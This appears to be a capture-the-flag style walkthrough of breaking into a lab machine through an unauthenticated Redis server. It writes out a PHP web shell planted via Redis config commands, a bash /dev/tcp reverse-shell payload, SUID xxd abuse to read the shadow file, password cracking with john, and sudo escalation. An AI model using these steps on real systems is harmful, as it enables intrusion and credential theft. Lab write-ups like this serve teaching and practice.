.png)
5 months ago
44 BOOK THIS SPACE FOR AD
ARTICLE AD
In this scenario, our target is Redis, one of the structured databases. We will show you how to plan an attack with methodological approaches.
Redis (Remote Dictionary Server) is an open-source, in-memory data structure store that can be used as a database, cache, and message broker. Sometimes the systems we encounter are closely related to databases, and system vulnerabilities are found in services connected to this database.
You can also add this resource to your list as a guide: https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
In this article, you may sometimes see different IPs and machines such as Kali or Ubuntu, because the machine connection is lost. We will also switch between machines to use different tools. Ignore these and just follow the methodology.
You can run all processes only on Kali.
Let’s start the attack scenario, punks!
People who have read the articles by now know what we’re going to do. Record the values you will use in the attack on the shell.
For more wordlists, you can browse to /usr/share/wordlists on your machine.
Ping your target.
Register your target in your local DNS, for this you must add the IP value to /etc/hosts file.
Ping it to check.
We are ready to discover!
Let’s discover the contents, versions and system information of the target network using our Nmap tool: nmap -sV -sC -oN nmap_result.txt -Pn --min-rate 1000 -T4 -p- -A $target_ip
-sV:Service Version Detection: Probes open ports to determine what service and version are running.-sC:Default Scripts: Enables the use of the default set of nmap scripts. These scripts perform various tasks, such as version detection and basic vulnerability checks.-oN nmap_result.txt:Output to Normal File: Saves the scan results in normal output format to the specified file (nmap_result.txt).-Pn:No Ping: Disables the ping scan. nmap will not try to ping the target hosts before scanning. Useful for scanning hosts that do not respond to ping requests (ICMP).--min-rate 1000:Minimum Rate: Ensures that nmap sends packets at a minimum rate of 1000 packets per second. This can speed up the scan significantly, especially for large scans.-T4:Timing Template: Sets the timing template to 4 (Aggressive), which speeds up the scan by reducing the wait times between probe transmissions.-p-:Scan All Ports: Tells nmap to scan all 65,535 TCP ports.-A:Aggressive Scan Options: Enables several advanced and aggressive scan options, including OS detection, version detection, script scanning, and traceroute.This process will take time as it scans all ports. You must be patient.
As you can see, there is a port open that is not normally defined and that you will not see unless you specifically perform a general port scan. Ports 80 (HTTP) and 6379 (Redis) are operated on the target. We can create attack scenarios on these.
There are also advisory notes along with some version information. You can conduct exploit research on versions and investigate existing attack methods.
Apache 2.4.18Redis 6.0.7It’s time to take a look at the application running on HTTP.
You may choose to conduct a directory search to obtain hidden pages. Before that, we will focus on Redis.
Let’s run another nmap script: nmap --script redis-info -sV -p 6379 -oN redis_nmap.txt $target_ip
We can perform control using the tools offered under “redis-tools”. Install by sudo apt-get install redis-tools
When working on a new tool, be sure to pay attention to additional parameters and features. You can check https://auth0.com/blog/introduction-to-redis-install-cli-commands-and-data-types/
For more parameters: https://redis.io/docs/latest/develop/connect/cli/
Now use redis-cli -h $target_ip --insecure
We’ve got the link, now let’s get some general interest. Use info command via Redis.
Redis can be configured to enhance security by requiring authentication, either through a simple password or a combination of username and password. By default, Redis does not require any authentication, which means it can be accessed without credentials. However, for production environments, it’s important to configure authentication to prevent unauthorized access. In our case Redis can be accessed without any credentials.
We have a potential username, vianka. You see the following parameters in the output:
executable:/home/vianka/redis-stable/src/redis-serverconfig_file:/home/vianka/redis-stable/redis.conf
List for client by using client list
Check for config by using CONFIG GET *
Get all the “keys” with KEYS *
In the light of the information we have obtained, we can attempt RCE (Remote Code Execution).
To automate it further, you can install https://github.com/n0b0dyCN/redis-rogue-server on your system, but we will prefer to use it actively on PHP.
Let’s do these one by one.
The sequence of commands we provided is an example of a remote code execution (RCE) attack against a Redis server that has been configured insecurely. In this scenario, we can exploit the Redis server’s configuration to write arbitrary files to the file system, potentially allowing the execution of malicious code.
config set dir: This command changes the directory where Redis will save its database files to the web root directory of an Nginx server.config set dbfilename: This command changes the name of the database fileset test : This command creates a key (test) in the Redis database with the value being a PHP scriptControl it.
We need to go one step further and transform the same process into a structure where we can run commands. Use <? php system($_GET[‘cmd’]); ?>
Let’s check the RCE. Pay attention to the commands we define via the URL.
Now get the reverse shell with a new command you define, either via the URL or via Redis.
We will use “<?php exec(\”/bin/bash -c ‘bash -i > /dev/tcp/10.10.252.115/12444 0>&1’\”); ?>”
Let’s put our machine in listening mode via the port we specified: nc -nlvp 12444
Then just browse 10.10.239.33/redis.php
We got that!
Let’s see what “vianka” has in store.
Let’s check the version in the system: lsb_release -a
We need to look at what privilege authorization is.
We tried to search for /etc/shadow , but there is no result.
Let’s do a test on binary vulnerabilities and check if “xxd” is available. You should check out this location /usr/bin
Yes, we have it.
xxd is a command-line utility in Unix-like operating systems that is used for creating a hex dump of a given file or standard input. It can also be used to reverse the operation and convert a hex dump back into its original binary form.
Check out what approaches you can try from this resource: https://gtphobians.github.io/gtfobins/xxd/
SUID (Set User ID) is a special type of file permission given to a file in Unix-like operating systems. When a file with the SUID bit set is executed, it runs with the privileges of the file’s owner, rather than the privileges of the user who is running the file. This can be useful for allowing normal users to execute programs with elevated privileges.
We can read a file as root, as the file as the SUID bit set. Let’s try it.
Stable the shell: python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Now we have achieved what we wanted!
We need to find out which hash format it is.
We have a password in SHA-512 format. Save this to a file on local as johnhashtarget
We will use the john tool to break this: john --wordlist=/usr/share/wordlists/rockyou.txt johnhashtarget
You got bea**** pass.
Now we can try to change usersu viankacommand.
This output is from the sudo configuration file (/etc/sudoers) on an Ubuntu system. It provides information about the default settings and permissions granted to the user vianka for running commands with elevated privileges using sudo.
Matching Defaults entries for vianka on ubuntu:
env_reset: This resets environment variables to a default state when running sudo commands.mail_badpass: This sends an email to the mail administrator if a user enters an incorrect password.secure_path: This sets the PATH environment variable for sudo commands to a secure list of directories. This prevents potentially malicious programs from being run accidentally.User vianka may run the following commands on ubuntu:
(ALL : ALL) ALL: This specifies the permissions granted to the user vianka when using sudo. Specifically:ALL indicates that vianka can run commands as any user.ALL indicates that vianka can run commands on any host.ALL indicates that vianka can run any command.Now it’s time to become root withsudo su command.
That is it!
Don’t give up on hacking.
Code for good.
^-^
Bengali (Bangladesh) · 
English (United States) ·